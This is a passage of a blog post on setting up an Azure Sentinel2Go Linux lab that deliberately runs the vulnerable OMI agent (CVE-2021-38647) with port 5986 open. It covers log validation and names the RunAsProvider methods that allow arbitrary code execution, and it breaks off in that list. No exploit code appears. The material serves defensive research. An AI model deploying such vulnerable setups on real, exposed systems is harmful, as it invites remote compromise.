allows the streaming of events from Linux-based, syslog supporting devices into Azure Sentinel.&nbsp;However, AUOMS is not set up by default as shown below:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="auoms_not_enabled.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311930iFBE6875E18F4C807/image-size/large?v=v2&amp;px=999" role="button" title="auoms_not_enabled.png" alt="auoms_not_enabled.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">My colleague Kevin Sheldrake&nbsp;documented&nbsp;everything that is required to set it up&nbsp;in&nbsp;this blog post&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-threats-on-linux-with-azure-sentinel/ba-p/1344431" target="_blank" rel="noopener"><SPAN data-contrast="none">Hunting Threats on Linux with Azure Sentinel</SPAN></A><SPAN data-contrast="auto">.</SPAN></P> <P>&nbsp;</P> <H4><FONT size="4"><SPAN data-contrast="auto">The question is “</SPAN><STRONG><SPAN data-contrast="auto">How do we automate the whole setup?</SPAN></STRONG><SPAN data-contrast="auto">”</SPAN></FONT></H4> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Enter Azure Sentinel To-go!</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">Azure Sentinel2Go is an&nbsp;open-source&nbsp;project developed to expedite the deployment of an Azure Sentinel lab along with other Azure resources and a data ingestion pipeline to consume pre-recorded datasets for research purposes.</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Azure Sentinel +&nbsp;Linux Environment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">Currently, we have&nbsp;a Linux environment ready to go and deploy&nbsp;everything needed for a&nbsp;small&nbsp;research lab with AUOMS configured&nbsp;and sending logs to Azure Sentinel:</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We were able to use <A href="#" target="_self">Azure Resource Manager (ARM)</A> templates and a few bash scripts to automate the whole setup. These are all the resources used for each component of the lab:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel&nbsp;instance</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog&nbsp;data connector</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog data collection from specific facilities</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Linux Virtual Machines</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Linux virtual machines</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">OMS Agent for Linux installer</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">OMS&nbsp;Auditd&nbsp;Plugin setup</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">AUOMS Syslog config</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">AUOMS rules</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> </LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">What about the OMI Vulnerability?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">As we know,&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">older versions of&nbsp;the OMI agent</SPAN></A><SPAN data-contrast="auto">&nbsp;(&lt;&nbsp;1.6.8.1) are vulnerable. Therefore, we created the following script to install <A href="#" target="_self">version 1.6.8.0</A>, and open port 5986.</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Blacksmith/Install-OMI.sh at master · OTRF/Blacksmith (github.com)</SPAN></A></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">We added that script to the Linux lab templates, and we now have a demo environment that you can also use to learn more about the exploitation of the OMI vulnerability.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Deploying&nbsp;the Lab Environment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><STRONG>Remember that this vulnerability is actively being exploited. Therefore, make sure you do not expose your lab environment to the Internet.</STRONG></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Go to&nbsp;the following link:&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Click on the “</SPAN><I><SPAN data-contrast="auto">Deploy to Azure</SPAN></I><SPAN data-contrast="auto">” Button</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="linux_lab_deploy_button.png" style="width: 855px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311931i16B6B1518B668E5A/image-size/large?v=v2&amp;px=999" role="button" title="linux_lab_deploy_button.png" alt="linux_lab_deploy_button.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Fill out the following parameters:</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Subscription (selected by default)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Resource group</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Region (selected by default)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Admin Username</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Admin Password</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Remote Access Mode (</SPAN><I><SPAN data-contrast="auto">AllowPublicIP</SPAN></I><SPAN data-contrast="auto">&nbsp;selected by default. You can also use Azure Bastion Host.&nbsp;You&nbsp;would just&nbsp;need to set the&nbsp;</SPAN><I><SPAN data-contrast="auto">Allowed IP Addresses</SPAN></I><SPAN data-contrast="auto">&nbsp;parameter to *)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Allowed IP Addresses (If you use the default access mode&nbsp;</SPAN><I><SPAN data-contrast="auto">AllowPublicIP</SPAN></I><SPAN data-contrast="auto">, use your home or office public IP address&nbsp;to only allow access from secure places. <STRONG>Remember that this vulnerability is actively being exploited. Therefore, make sure you do not expose your lab environment to the Internet.</STRONG></SPAN><SPAN data-contrast="auto">)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="deploy_environment_parameters.png" style="width: 916px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311932i6486F9ACA5DF66CC/image-size/large?v=v2&amp;px=999" role="button" title="deploy_environment_parameters.png" alt="deploy_environment_parameters.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN class="TextRun SCXW100673580 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW100673580 BCX8">Click the Review &gt; Create buttons to start the deployment</SPAN></SPAN><SPAN class="EOP SCXW100673580 BCX8" data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="deployment_in_progress.png" style="width: 502px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311933i1AAFBB48EC98F6C6/image-size/large?v=v2&amp;px=999" role="button" title="deployment_in_progress.png" alt="deployment_in_progress.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN class="TextRun SCXW14026402 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW14026402 BCX8">You<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW14026402 BCX8">can go to your resource group and explore all the resources being deployed</SPAN></SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="resources_being_created.png" style="width: 760px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311934i3BC4C9CDFAB7AE40/image-size/large?v=v2&amp;px=999" role="button" title="resources_being_created.png" alt="resources_being_created.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="4" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><SPAN data-contrast="auto">Wait around 5-10 minutes!&nbsp;You should be good to go!</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Validate Deployment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">It is very important to validate if everything was deployed properly before&nbsp;doing research.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">OMI Server</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">SSH to your virtual machines&nbsp;and check the OMI version to confirm it is&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">1.6.8-0</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">/opt/omi/bin/omiserver&nbsp;-v</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_omi_server_version.png" style="width: 742px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311939iA31C642B149B6E0A/image-size/large?v=v2&amp;px=999" role="button" title="validate_omi_server_version.png" alt="validate_omi_server_version.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Check if the OMI service is running</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">systemctl&nbsp;status&nbsp;omid</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_omid_server_is_running.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311940i75C039806DED7E93/image-size/large?v=v2&amp;px=999" role="button" title="validate_omid_server_is_running.png" alt="validate_omid_server_is_running.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Check&nbsp;if port 5986 is open&nbsp;(You might have to update your package manager and install net-tools)</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">netstat -na&nbsp;| grep :5986</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_omi_5986_port.png" style="width: 836px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311941i82E8345DF5CD987D/image-size/large?v=v2&amp;px=999" role="button" title="validate_omi_5986_port.png" alt="validate_omi_5986_port.png" /></span></SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">AUOMS Setup</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">Check if the AUOMS service is running with the following two commands:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">sudo&nbsp;/opt/microsoft/auoms/bin/auomsctl&nbsp;status</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_auoms_server_is_running.png" style="width: 703px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311942iB4C73CCF37824EE4/image-size/large?v=v2&amp;px=999" role="button" title="validate_auoms_server_is_running.png" alt="validate_auoms_server_is_running.png" /></span></SPAN></P> <P>&nbsp;</P> <PRE><SPAN class="TextRun SCXW244722716 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SpellingErrorV2 SCXW244722716 BCX8">systemctl</SPAN><SPAN class="NormalTextRun SCXW244722716 BCX8"><SPAN>&nbsp;</SPAN>status<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW244722716 BCX8">auoms</SPAN></SPAN><SPAN class="EOP SCXW244722716 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_auoms_server_is_running_2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311943i406C396C794104F2/image-size/large?v=v2&amp;px=999" role="button" title="validate_auoms_server_is_running_2.png" alt="validate_auoms_server_is_running_2.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Check if events are&nbsp;being sent to the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">OMS Agent</SPAN></STRONG><SPAN data-contrast="auto">:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Open another SSH session to your virtual machine and in one run the following command:</SPAN></LI> </UL> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">sudo&nbsp;/opt/microsoft/auoms/bin/auomsctl&nbsp;monitor</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="10" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Then, in the other session run&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">whoami.&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">If everything is connected properly, you will be able to see events flowing through your first session as shown below:</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_auoms_can_send_events.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311944i73AAC7959DD3EE21/image-size/large?v=v2&amp;px=999" role="button" title="validate_auoms_can_send_events.png" alt="validate_auoms_can_send_events.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You can continue using `</SPAN><STRONG><SPAN data-contrast="auto">sudo&nbsp;/opt/microsoft/auoms/bin/auomsctl&nbsp;monitor`&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">if you want to do research locally. You can have it running while you test the exploitation of the OMI vulnerability.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">Check if logs are being sent to your Azure Sentinel&nbsp;instance.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="6" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="none"><A href="#" target="_blank" rel="noopener">https://portal.azure.com/</A></SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="6" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_azure_sentinel.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311945iDD106A4E8BC76C2D/image-size/large?v=v2&amp;px=999" role="button" title="validate_azure_sentinel.png" alt="validate_azure_sentinel.png" /></span></SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN class="TextRun SCXW2347696 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW2347696 BCX8">Click on `logs` and explore the `Syslog` table</SPAN></SPAN><SPAN class="EOP SCXW2347696 BCX8" data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="validate_syslog_events_are_flowing.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311946iFE26DCDE940CDF9D/image-size/large?v=v2&amp;px=999" role="button" title="validate_syslog_events_are_flowing.png" alt="validate_syslog_events_are_flowing.png" /></span></SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Learning&nbsp;About the&nbsp;OMI vulnerability</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">After validating that everything was deployed properly,</SPAN><SPAN data-contrast="auto">&nbsp;you</SPAN><SPAN data-contrast="auto">&nbsp;should be ready to run a few public&nbsp;proofs&nbsp;of concepts to test the OMI vulnerability.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">One thing to remember is that there are three ways to execute arbitrary code via OMI. They are all part of the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><STRONG><SPAN data-contrast="none">SCX RunAsProvider</SPAN></STRONG></A><STRONG><SPAN data-contrast="auto">&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">and their execution context varies a little bit.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ExecuteCommand</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ExecuteShellCommand</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN 